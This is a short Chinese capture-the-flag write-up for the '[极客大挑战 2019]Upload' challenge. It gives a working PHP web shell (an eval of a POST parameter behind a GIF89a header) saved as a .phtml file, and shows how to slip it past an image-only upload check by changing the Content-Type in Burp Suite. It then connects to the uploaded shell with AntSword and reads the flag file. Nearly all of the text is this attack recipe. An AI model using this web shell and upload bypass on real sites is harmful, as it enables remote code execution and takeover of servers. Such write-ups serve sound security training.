[极客大挑战 2019]Upload
进入页面
选择phtml的文件上传 上传木马 木马内容为
GIF89a
<script language="php">eval($_POST['flag']);</script>
在上传文件的时候用burp suite抓包
因为只允许图片上传 所以
Content-Type: image/jpeg
然后放行
然后蚁剑连接
地址
http://11990597-cb68-43a4-b37b-0afc623745e9.node3.buuoj.cn/upload/mm.phtml
密码(木马里面自己编写的)
flag
右击 点击虚拟终端
命令 cat /flag 得flag